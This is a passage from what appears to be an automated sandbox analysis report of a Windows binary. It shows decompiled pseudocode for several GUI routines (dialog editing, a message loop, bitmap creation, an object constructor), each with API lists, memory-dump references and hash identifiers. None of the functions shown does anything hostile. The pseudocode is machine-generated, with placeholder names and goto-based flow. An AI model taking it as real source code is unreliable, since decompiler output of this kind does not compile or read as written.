      0x009b5e1b
      0x009b5e20
      0x009b5e23
      0x009b5e26
      0x009b5e2c
      0x009b5e2c
      0x009b5e63
      0x009b5e6d
      0x00000000
      0x009b5e7a
      0x009b5e7a
      0x009b5e7a
      0x009b5e7d
      0x009b5e84
      0x009b5e85
      0x009b5e86
      0x009b5e90
      0x009b5e88
      0x009b5e88
      0x009b5e88
      0x009b5e96
      0x009b5e98
      0x009b5e99
      0x009b5ea2
      0x009b5ea3
      0x009b5ea6
      0x009b5ebc
      0x009b5ec4
      0x009b5ec6
      0x009b5eca
      0x009b5ecd
      0x009b5ed0
      0x009b5ed9
      0x009b5ee2
      0x009b5f24
      0x009b5f38
      0x009b5f44
      0x009b5f57
      0x009b5f63
      0x009b5f70
      0x009b5f7c
      0x009b5f7c
      0x009b5ee2
      0x009b5f85
      0x009b5f8a
      0x009b5f8a
      0x009b5f90
      0x009b5f95
      0x009b5fc9
      0x009b5f97
      0x009b5f9f
      0x009b5fa1
      0x009b5fa1
      0x009b5fa8
      0x009b5fac
      0x009b5fb7
      0x009b5fc3
      0x009b5fc3

      APIs
      • __EH_prolog3_GS.LIBCMT ref: 009B5CCD
      • MapDialogRect.USER32(?,?), ref: 009B5D6B
      • SysAllocStringLen.OLEAUT32(?,?), ref: 009B5D8A
      • CLSIDFromString.OLE32(?,?,00000000), ref: 009B5E88
        • Part of subcall function 009A6291: _malloc.LIBCMT ref: 009A62AF
      • CLSIDFromProgID.OLE32(?,?,00000000), ref: 009B5E90
      • SetWindowPos.USER32(?,?,00000000,00000000,00000000,00000000,00000013,00000001,00000000,?,00000000,?,?,00000000,?,00000000), ref: 009B5F38
      • SysFreeString.OLEAUT32(00000000), ref: 009B5F8A
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: String$From$AllocDialogFreeH_prolog3_ProgRectWindow_malloc
      • String ID:
      • API String ID: 2980224915-0
      • Opcode ID: 4096b86483742858d29c723d91a22883b3c2ab8c644bbf64cea64eebf93240c7
      • Instruction ID: f2d320726a6b589f9c6e98b1b04c5f609c4c45c62fdba20c9b86ccbbd876eec0
      • Opcode Fuzzy Hash: 4096b86483742858d29c723d91a22883b3c2ab8c644bbf64cea64eebf93240c7
      • Instruction Fuzzy Hash: 4AB11470D00619DFCB14DFA8C984AEDBBB8FF08314F11412AE81AAB251E774AA85CF51
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009C94FB Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 127stringCOMMON
      Download Yara Rule
      C-Code - Quality: 87%
      			E009C94FB(void* __ebx, void** __ecx, void* __edx, void* __esi, char* _a4, short _a8) {
				signed int _v8;
				short _v72;
				char* _v76;
				signed int _v80;
				signed int* _v84;
				signed int _v88;
				intOrPtr _v92;
				void* __edi;
				signed int _t55;
				void* _t65;
				char* _t69;
				short* _t70;
				signed int _t72;
				signed int* _t83;
				short* _t84;
				void* _t93;
				signed int* _t101;
				signed int _t102;
				void** _t103;
				intOrPtr _t105;
				signed int _t107;
				signed int _t109;
				void* _t110;

				_t104 = __esi;
				_t99 = __edx;
				_t82 = __ebx;
				_t55 =  *0xd0c910; // 0x3a0e8b0c
				_v8 = _t55 ^ _t109;
				_t103 = __ecx;
				_v76 = _a4;
				if(__ecx[1] != 0) {
					_push(__ebx);
					_push(__esi);
					_t83 = GlobalLock( *__ecx);
					_v84 = _t83;
					_v88 = 0 | _t83[0] == 0x0000ffff;
					_v80 = E009C9345(_t83);
					_t105 = (0 | _v88 != 0x00000000) + (0 | _v88 != 0x00000000) + 1 + (0 | _v88 != 0x00000000) + (0 | _v88 != 0x00000000) + 1;
					_v92 = _t105;
					if(_v88 == 0) {
						 *_t83 =  *_t83 | 0x00000040;
					} else {
						_t83[3] = _t83[3] | 0x00000040;
					}
					if(lstrlenA(_v76) >= 0x20) {
						L15:
						_t65 = 0;
					} else {
						_t69 = _t105 + MultiByteToWideChar(0, 0, _v76, 0xffffffff,  &_v72, 0x20) * 2;
						_v76 = _t69;
						if(_t69 < _t105) {
							goto L15;
						} else {
							_t70 = E009C9378(_t83);
							_t93 = 0;
							_t84 = _t70;
							if(_v80 != 0) {
								_t30 = E00AAF260(_t84 + _t105) * 2; // 0x76c46af2
								_t93 = _t105 + _t30 + 2;
							}
							_t34 =  &(_v76[3]); // 0x3
							_t101 = _v84;
							_t37 = _t84 + 3; // 0x76c46af5
							_t72 = _t93 + _t37 & 0xfffffffc;
							_t107 = _t84 + _t34 & 0xfffffffc;
							_v80 = _t72;
							if(_v88 == 0) {
								_t102 =  *(_t101 + 8) & 0x0000ffff;
							} else {
								_t102 =  *(_t101 + 0x10) & 0x0000ffff;
							}
							if(_v76 == _t93 || _t102 == 0) {
								L17:
								 *_t84 = _a8;
								_t99 =  &_v72;
								E009BBE9E(_t84 + _v92, _v76 - _v92,  &_v72, _v76 - _v92);
								_t103[1] = _t103[1] + _t107 - _v80;
								GlobalUnlock( *_t103);
								_t103[2] = _t103[2] & 0x00000000;
								_t65 = 1;
							} else {
								_t99 = _t103[1];
								_t97 = _t99 - _t72 + _v84;
								if(_t99 - _t72 + _v84 <= _t99) {
									E009BBE9E(_t107, _t97, _t72, _t97);
									_t110 = _t110 + 0x10;
									goto L17;
								} else {
									goto L15;
								}
							}
						}
					}
					_pop(_t104);
					_pop(_t82);
				} else {
					_t65 = 0;
				}
				return E00AAB46A(_t65, _t82, _v8 ^ _t109, _t99, _t103, _t104);
			}


























      0x009c94fb
      0x009c94fb
      0x009c94fb
      0x009c9503
      0x009c950a
      0x009c9511
      0x009c9517
      0x009c951a
      0x009c9523
      0x009c9524
      0x009c952d
      0x009c953e
      0x009c9541
      0x009c9549
      0x009c955d
      0x009c9560
      0x009c9563
      0x009c956b
      0x009c9565
      0x009c9565
      0x009c9565
      0x009c957a
      0x009c95f8
      0x009c95f8
      0x009c957c
      0x009c9591
      0x009c9594
      0x009c9599
      0x00000000
      0x009c959b
      0x009c959c
      0x009c95a2
      0x009c95a4
      0x009c95a9
      0x009c95b5
      0x009c95b5
      0x009c95b5
      0x009c95bc
      0x009c95c0
      0x009c95c3
      0x009c95c7
      0x009c95ca
      0x009c95d1
      0x009c95d4
      0x009c95dc
      0x009c95d6
      0x009c95d6
      0x009c95d6
      0x009c95e3
      0x009c9608
      0x009c960f
      0x009c9618
      0x009c9620
      0x009c962d
      0x009c9630
      0x009c9636
      0x009c963c
      0x009c95ea
      0x009c95ea
      0x009c95f1
      0x009c95f6
      0x009c9600
      0x009c9605
      0x00000000
      0x00000000
      0x00000000
      0x00000000
      0x009c95f6
      0x009c95e3
      0x009c9599
      0x009c963d
      0x009c963e
      0x009c951c
      0x009c951c
      0x009c951c
      0x009c964b

      APIs
      • GlobalLock.KERNEL32 ref: 009C9527
      • lstrlenA.KERNEL32(?), ref: 009C9571
      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 009C958B
      • _wcslen.LIBCMT ref: 009C95AF
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: ByteCharGlobalLockMultiWide_wcslenlstrlen
      • String ID: System
      • API String ID: 4253822919-3470857405
      • Opcode ID: fe877c25654737ddb294b95d60a938703e69b218524a6dd1d565382331d30a28
      • Instruction ID: 2a2b41aeb0fdb57ff761ad80ced6d7d074369bf475177e4c9640484bffd29b2f
      • Opcode Fuzzy Hash: fe877c25654737ddb294b95d60a938703e69b218524a6dd1d565382331d30a28
      • Instruction Fuzzy Hash: C841AF71D002199FCF14DFA4C989BADBBB8FF04310F14852EE816EB295DB749946CB51
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009AC4CD Relevance: 10.6, APIs: 7, Instructions: 117windowCOMMON
      Download Yara Rule
      C-Code - Quality: 92%
      			E009AC4CD(intOrPtr* __ecx, void* __edx, signed int _a4) {
				int _v8;
				int _v12;
				int _v16;
				struct tagMSG* _v20;
				struct HWND__* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HWND__* _t48;
				struct tagMSG* _t49;
				signed int _t51;
				void* _t54;
				void* _t56;
				int _t59;
				long _t62;
				signed int _t66;
				void* _t69;
				intOrPtr* _t71;
				void* _t73;
				intOrPtr* _t75;

				_t73 = __edx;
				_t70 = __ecx;
				_t75 = __ecx;
				_v16 = 1;
				_v12 = 0;
				if((_a4 & 0x00000004) == 0) {
					L2:
					_v8 = 0;
					L3:
					_t48 = GetParent( *(_t75 + 0x20));
					 *(_t75 + 0x58) =  *(_t75 + 0x58) | 0x00000018;
					_v24 = _t48;
					_t49 = E009B2B0C(_t77);
					_t69 = UpdateWindow;
					_v20 = _t49;
					while(1) {
						_t78 = _v16;
						if(_v16 == 0) {
							goto L15;
						}
						while(1) {
							L15:
							_t51 = E009B2F38(_t70, _t73, 0, _t75, _t78);
							if(_t51 == 0) {
								break;
							}
							if(_v8 != 0) {
								_t59 = _v20->message;
								if(_t59 == 0x118 || _t59 == 0x104) {
									E009B0BD1(_t75, 1);
									UpdateWindow( *(_t75 + 0x20));
									_v8 = 0;
								}
							}
							_t71 = _t75;
							_t54 =  *((intOrPtr*)( *_t75 + 0x88))();
							_t83 = _t54;
							if(_t54 == 0) {
								_t45 = _t75 + 0x58;
								 *_t45 =  *(_t75 + 0x58) & 0xffffffe7;
								__eflags =  *_t45;
								return  *((intOrPtr*)(_t75 + 0x60));
							} else {
								_push(_v20);
								_t56 = E009B2E3B(_t69, _t71, 0, _t75, _t83);
								_pop(_t70);
								if(_t56 != 0) {
									_v16 = 1;
									_v12 = 0;
								}
								if(PeekMessageA(_v20, 0, 0, 0, 0) == 0) {
									while(1) {
										_t78 = _v16;
										if(_v16 == 0) {
											goto L15;
										}
										goto L4;
									}
								}
								continue;
							}
						}
						_push(0);
						E009B17FA();
						return _t51 | 0xffffffff;
						L4:
						__eflags = PeekMessageA(_v20, 0, 0, 0, 0);
						if(__eflags != 0) {
							goto L15;
						} else {
							__eflags = _v8;
							if(_v8 != 0) {
								_t70 = _t75;
								E009B0BD1(_t75, 1);
								UpdateWindow( *(_t75 + 0x20));
								_v8 = 0;
							}
							__eflags = _a4 & 0x00000001;
							if((_a4 & 0x00000001) == 0) {
								__eflags = _v24;
								if(_v24 != 0) {
									__eflags = _v12;
									if(_v12 == 0) {
										SendMessageA(_v24, 0x121, 0,  *(_t75 + 0x20));
									}
								}
							}
							__eflags = _a4 & 0x00000002;
							if(__eflags != 0) {
								L13:
								_v16 = 0;
								continue;
							} else {
								_t62 = SendMessageA( *(_t75 + 0x20), 0x36a, 0, _v12);
								_v12 = _v12 + 1;
								__eflags = _t62;
								if(__eflags != 0) {
									continue;
								}
								goto L13;
							}
						}
					}
				}
				_t66 = E009B0A7A(__ecx);
				_v8 = 1;
				_t77 = _t66 & 0x10000000;
				if((_t66 & 0x10000000) == 0) {
					goto L3;
				}
				goto L2;
			}
























      0x009ac4cd
      0x009ac4cd
      0x009ac4e1
      0x009ac4e3
      0x009ac4e6
      0x009ac4e9
      0x009ac4fa
      0x009ac4fa
      0x009ac4fd
      0x009ac500
      0x009ac506
      0x009ac50a
      0x009ac50d
      0x009ac512
      0x009ac518
      0x009ac588
      0x009ac588
      0x009ac58b
      0x00000000
      0x00000000
      0x009ac58d
      0x009ac58d
      0x009ac58d
      0x009ac594
      0x00000000
      0x00000000
      0x009ac599
      0x009ac59e
      0x009ac5a6
      0x009ac5b3
      0x009ac5bb
      0x009ac5bd
      0x009ac5bd
      0x009ac5a6
      0x009ac5c2
      0x009ac5c4
      0x009ac5ca
      0x009ac5cc
      0x009ac603
      0x009ac603
      0x009ac603
      0x00000000
      0x009ac5ce
      0x009ac5ce
      0x009ac5d1
      0x009ac5d6
      0x009ac5d9
      0x009ac5db
      0x009ac5e2
      0x009ac5e2
      0x009ac5f4
      0x009ac588
      0x009ac588
      0x009ac58b
      0x00000000
      0x00000000
      0x00000000
      0x009ac58b
      0x009ac588
      0x00000000
      0x009ac5f4
      0x009ac5cc
      0x009ac5f8
      0x009ac5f9
      0x00000000
      0x009ac51d
      0x009ac52a
      0x009ac52c
      0x00000000
      0x009ac52e
      0x009ac52e
      0x009ac531
      0x009ac535
      0x009ac537
      0x009ac53f
      0x009ac541
      0x009ac541
      0x009ac544
      0x009ac548
      0x009ac54a
      0x009ac54d
      0x009ac54f
      0x009ac552
      0x009ac560
      0x009ac560
      0x009ac552
      0x009ac54d
      0x009ac566
      0x009ac56a
      0x009ac585
      0x009ac585
      0x00000000
      0x009ac56c
      0x009ac578
      0x009ac57e
      0x009ac581
      0x009ac583
      0x00000000
      0x00000000
      0x00000000
      0x009ac583
      0x009ac56a
      0x009ac52c
      0x009ac588
      0x009ac4eb
      0x009ac4f0
      0x009ac4f3
      0x009ac4f8
      0x00000000
      0x00000000
      0x00000000

      APIs
      • GetParent.USER32(?), ref: 009AC500
      • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 009AC524
      • UpdateWindow.USER32(?), ref: 009AC53F
      • SendMessageA.USER32 ref: 009AC560
      • SendMessageA.USER32 ref: 009AC578
      • UpdateWindow.USER32(?), ref: 009AC5BB
      • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 009AC5EC
        • Part of subcall function 009B0A7A: GetWindowLongA.USER32 ref: 009B0A85
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Message$Window$PeekSendUpdate$LongParent
      • String ID:
      • API String ID: 2853195852-0
      • Opcode ID: de12250d3d2fd2d1e9e9c57f82e743a723cda140c0bd89b4a9af4c637e965813
      • Instruction ID: a7e03440e46d26e1ee5e9bbd478ab75b29edb979cc6187805a6076c057bc3f97
      • Opcode Fuzzy Hash: de12250d3d2fd2d1e9e9c57f82e743a723cda140c0bd89b4a9af4c637e965813
      • Instruction Fuzzy Hash: 5E4180B0E04249ABCF219FA5CD48AAEBBF8FF82754F104559F442AA160D7719A40DB90
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009D70FC Relevance: 10.6, APIs: 7, Instructions: 111COMMON
      Download Yara Rule
      C-Code - Quality: 96%
      			E009D70FC(void* __ebx, void* __edx, void* __eflags, long _a4, signed int _a8, long _a12, long _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				void* __ecx;
				void* __ebp;
				long _t32;
				signed int _t34;
				void* _t41;
				struct tagBITMAPINFOHEADER _t50;
				signed int _t51;
				void* _t53;
				long _t55;
				void* _t61;
				void* _t63;
				BITMAPINFO* _t66;
				signed int _t67;
				signed int _t69;
				signed int _t70;

				_t61 = __edx;
				_push(_t53);
				_v8 = _v8 & 0x00000000;
				_t63 = _t53;
				_t66 = E009B947A(__ebx,  &_v8, __eflags, 0x428);
				if(_t66 != 0) {
					_push(__ebx);
					_t50 = 0x28;
					E00AAB3F0(_t66, 0, _t50);
					_t55 = _a16;
					_t66->bmiHeader.biWidth = _a4;
					_t66->bmiHeader.biPlanes = 1;
					_t32 = _a12;
					_t66->bmiHeader = _t50;
					_t51 = _a8;
					_t66->bmiHeader.biHeight = _t51;
					_t66->bmiHeader.biBitCount = _t32;
					_t66->bmiHeader.biCompression = _t55;
					__eflags = _t32 - 8;
					if(_t32 > 8) {
						__eflags = _t55 - 3;
						if(_t55 == 3) {
							_t16 =  &(_t66->bmiColors); // 0x28
							E009A6677(_t55, E00AAC44E(_t16, 0xc, _a20, 0xc));
						}
					} else {
						_t14 =  &(_t66->bmiColors); // 0x28
						E00AAB3F0(_t14, 0, 0x400);
					}
					_t17 = _t63 + 8; // 0x8
					_t34 = CreateDIBSection(0, _t66, 0, _t17, 0, 0);
					__eflags = _t34;
					if(_t34 != 0) {
						 *(_t63 + 4) = _t34;
						__eflags = _t51;
						E009D539C(_t63, _t61, (0 | _t51 > 0x00000000) + 1);
						__eflags = _a24 & 0x00000001;
						if((_a24 & 0x00000001) != 0) {
							 *((char*)(_t63 + 0x1d)) = 1;
						}
						_t67 = _v8;
						while(1) {
							__eflags = _t67;
							if(_t67 == 0) {
								break;
							}
							_t67 =  *_t67;
							E00AAB4AB(_t67);
						}
						_t41 = 1;
						__eflags = 1;
						goto L20;
					} else {
						_t69 = _v8;
						while(1) {
							__eflags = _t69;
							if(_t69 == 0) {
								break;
							}
							_t69 =  *_t69;
							E00AAB4AB(_t69);
						}
						_t41 = 0;
						L20:
						L21:
						return _t41;
					}
				}
				_t70 = _v8;
				while(_t70 != 0) {
					_t70 =  *_t70;
					E00AAB4AB(_t70);
				}
				_t41 = 0;
				goto L21;
			}



















      0x009d70fc
      0x009d7101
      0x009d7102
      0x009d7108
      0x009d7117
      0x009d711b
      0x009d7136
      0x009d7139
      0x009d713e
      0x009d7146
      0x009d7149
      0x009d714f
      0x009d7153
      0x009d7156
      0x009d7158
      0x009d715e
      0x009d7161
      0x009d7165
      0x009d7168
      0x009d716b
      0x009d7182
      0x009d7185
      0x009d718c
      0x009d7198
      0x009d719d
      0x009d716d
      0x009d7172
      0x009d7178
      0x009d717d
      0x009d71a4
      0x009d71ab
      0x009d71b1
      0x009d71b3
      0x009d71cb
      0x009d71d0
      0x009d71d9
      0x009d71de
      0x009d71e2
      0x009d71e4
      0x009d71e4
      0x009d71e8
      0x009d71f6
      0x009d71f6
      0x009d71f8
      0x00000000
      0x00000000
      0x009d71ee
      0x009d71f0
      0x009d71f5
      0x009d71fc
      0x009d71fc
      0x00000000
      0x009d71b5
      0x009d71b5
      0x009d71c3
      0x009d71c3
      0x009d71c5
      0x00000000
      0x00000000
      0x009d71bb
      0x009d71bd
      0x009d71c2
      0x009d71c7
      0x009d71fd
      0x009d71fe
      0x009d7201
      0x009d7201
      0x009d71b3
      0x009d711d
      0x009d712b
      0x009d7123
      0x009d7125
      0x009d712a
      0x009d712f
      0x00000000

      APIs
        • Part of subcall function 009B947A: _malloc.LIBCMT ref: 009B948D
      • _free.LIBCMT ref: 009D7125
      • _memset.LIBCMT ref: 009D713E
      • _memset.LIBCMT ref: 009D7178
      • _memcpy_s.LIBCMT ref: 009D7192
      • CreateDIBSection.GDI32(00000000,00000000,00000000,00000008,00000000,00000000), ref: 009D71AB
      • _free.LIBCMT ref: 009D71BD
      • _free.LIBCMT ref: 009D71F0
        • Part of subcall function 00AAB4AB: HeapFree.KERNEL32(00000000,00000000,?,00AAAEFC,?), ref: 00AAB4C1
        • Part of subcall function 00AAB4AB: GetLastError.KERNEL32(?,?,00AAAEFC,?), ref: 00AAB4D3
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: _free$_memset$CreateErrorFreeHeapLastSection_malloc_memcpy_s
      • String ID:
      • API String ID: 2204576675-0
      • Opcode ID: 74c017a606ba0b1d019389914fae5be5de9974984b7f6fe7936b19bfe3f1940e
      • Instruction ID: 06e98ae9d3f09a0e05147dbbc8094a8c13b0f3200054354b0f8d25892ba0cdfc
      • Opcode Fuzzy Hash: 74c017a606ba0b1d019389914fae5be5de9974984b7f6fe7936b19bfe3f1940e
      • Instruction Fuzzy Hash: EB31C872958615ABDB20DFA4CC41B6BF7ACEF15360F11891AF845E7341E774ED0187A0
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00A04EFF Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 111COMMON
      Download Yara Rule
      C-Code - Quality: 98%
      			E00A04EFF(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t94;
				struct tagRECT* _t98;
				intOrPtr _t117;
				void* _t118;
				void* _t119;

				_t119 = __eflags;
				_t113 = __edx;
				_push(4);
				E00AAD232(0xacc4c7, __ebx, __edi, __esi);
				_t117 = __ecx;
				 *((intOrPtr*)(_t118 - 0x10)) = __ecx;
				E009AB862(__ecx, __edx, _t119);
				 *((intOrPtr*)(_t118 - 4)) = 0;
				 *((intOrPtr*)(__ecx)) = 0xae1b34;
				E00A4FCE6(__ebx, __ecx + 0x74, __edx, 0, __ecx, _t119);
				 *((char*)(_t118 - 4)) = 1;
				E00A8494A(_t117 + 0x104, __edx, _t119);
				 *((char*)(_t118 - 4)) = 2;
				E00A840AA(_t117 + 0x1b0, _t119);
				 *((char*)(_t118 - 4)) = 3;
				E009AB862(_t117 + 0x244, _t113, _t119);
				 *((intOrPtr*)(_t117 + 0x244)) = 0xadccb4;
				 *((char*)(_t118 - 4)) = 4;
				E009A5D70(_t117 + 0x2d0, _t113, E009B9D52());
				 *((char*)(_t118 - 4)) = 5;
				E009A5D70(_t117 + 0x2d4, _t113, E009B9D52());
				 *((intOrPtr*)(_t117 + 0x2e4)) = 0;
				 *((intOrPtr*)(_t117 + 0x2e0)) = 0xad7e54;
				_t98 = _t117 + 0x2e8;
				_t98->left = 0;
				_t98->top = 0;
				_t98->right = 0;
				_t98->bottom = 0;
				 *(_t117 + 0x328) = 0;
				 *((intOrPtr*)(_t117 + 0x32c)) = 0;
				 *((intOrPtr*)(_t117 + 0x330)) = 0;
				 *((intOrPtr*)(_t117 + 0x334)) = 0;
				 *(_t117 + 0x338) = 0;
				 *((intOrPtr*)(_t117 + 0x33c)) = 0;
				 *((intOrPtr*)(_t117 + 0x340)) = 0;
				 *((intOrPtr*)(_t117 + 0x344)) = 0;
				E00A007A2(_t117 + 0x360, 0xa);
				E00A007A2(_t117 + 0x37c, 0xa);
				 *((intOrPtr*)(_t117 + 0x3c0)) = 0;
				 *((intOrPtr*)(_t117 + 0x3bc)) = 0xada220;
				 *(_t117 + 0x2f8) =  *(_t117 + 0x2f8) | 0xffffffff;
				 *((char*)(_t118 - 4)) = 0xa;
				 *((intOrPtr*)(_t117 + 0x2dc)) = 0;
				 *((intOrPtr*)(_t117 + 0x304)) = 0;
				 *((intOrPtr*)(_t117 + 0x308)) = 0;
				 *((intOrPtr*)(_t117 + 0x2b8)) = 1;
				 *((intOrPtr*)(_t117 + 0x2bc)) = 0;
				 *((intOrPtr*)(_t117 + 0x2fc)) = 3;
				 *((intOrPtr*)(_t117 + 0x2c4)) = 0;
				 *((intOrPtr*)(_t117 + 0x2c8)) = 0;
				SetRectEmpty(_t98);
				 *((intOrPtr*)(_t117 + 0x318)) = 0;
				SetRectEmpty(_t117 + 0x328);
				SetRectEmpty(_t117 + 0x338);
				 *((intOrPtr*)(_t117 + 0x314)) = 0;
				 *((intOrPtr*)(_t117 + 0x310)) = 0;
				 *((intOrPtr*)(_t117 + 0x31c)) = 0;
				 *((intOrPtr*)(_t117 + 0x320)) = 0;
				 *((intOrPtr*)(_t117 + 0x324)) = 0;
				 *((intOrPtr*)(_t117 + 0x398)) = 0;
				 *((intOrPtr*)(_t117 + 0x350)) = 0;
				 *((intOrPtr*)(_t117 + 0x300)) = 0;
				 *((intOrPtr*)(_t117 + 0x2c0)) = 1;
				 *((intOrPtr*)(_t117 + 0x348)) = 0;
				 *((intOrPtr*)(_t117 + 0x34c)) = 0;
				E009A6000(_t113, 0, "True");
				_t94 = E009A6000(_t113, 0, "False") | 0xffffffff;
				 *(_t117 + 0x3a0) = _t94;
				 *(_t117 + 0x3a4) = _t94;
				 *(_t117 + 0x3a8) = _t94;
				 *(_t117 + 0x3ac) = _t94;
				 *(_t117 + 0x3b0) = _t94;
				 *(_t117 + 0x3b4) = _t94;
				 *(_t117 + 0x3b8) = _t94;
				 *((char*)(_t117 + 0x2d8)) = 0x2c;
				 *((intOrPtr*)(_t117 + 0x354)) = 0;
				 *((intOrPtr*)(_t117 + 0x358)) = 1;
				 *((intOrPtr*)(_t117 + 0x35c)) = 1;
				 *((intOrPtr*)(_t117 + 0x2cc)) = 0;
				 *((intOrPtr*)(_t117 + 0x3c4)) = 0;
				 *((char*)(_t117 + 0x24)) = 1;
				return E00AAD30A(_t117);
			}








      0x00a04eff
      0x00a04eff
      0x00a04eff
      0x00a04f06
      0x00a04f0b
      0x00a04f0d
      0x00a04f10
      0x00a04f1a
      0x00a04f1d
      0x00a04f23
      0x00a04f2e
      0x00a04f32
      0x00a04f3d
      0x00a04f41
      0x00a04f4c
      0x00a04f50
      0x00a04f55
      0x00a04f5f
      0x00a04f6f
      0x00a04f74
      0x00a04f84
      0x00a04f89
      0x00a04f8f
      0x00a04f99
      0x00a04f9f
      0x00a04fa1
      0x00a04fa4
      0x00a04fa7
      0x00a04faa
      0x00a04fb0
      0x00a04fb6
      0x00a04fbc
      0x00a04fca
      0x00a04fd0
      0x00a04fd6
      0x00a04fdc
      0x00a04fe2
      0x00a04fef
      0x00a04ff4
      0x00a04ffa
      0x00a05004
      0x00a05012
      0x00a05016
      0x00a0501c
      0x00a05022
      0x00a05028
      0x00a05032
      0x00a05038
      0x00a05042
      0x00a05048
      0x00a0504e
      0x00a05057
      0x00a0505d
      0x00a05066
      0x00a05068
      0x00a0507c
      0x00a05082
      0x00a05088
      0x00a0508e
      0x00a05094
      0x00a0509a
      0x00a050a0
      0x00a050a6
      0x00a050ac
      0x00a050b2
      0x00a050b8
      0x00a050cd
      0x00a050d0
      0x00a050d6
      0x00a050dc
      0x00a050e2
      0x00a050e8
      0x00a050ee
      0x00a050f4
      0x00a050fa
      0x00a05101
      0x00a05107
      0x00a0510d
      0x00a05113
      0x00a05119
      0x00a0511f
      0x00a05129

      APIs
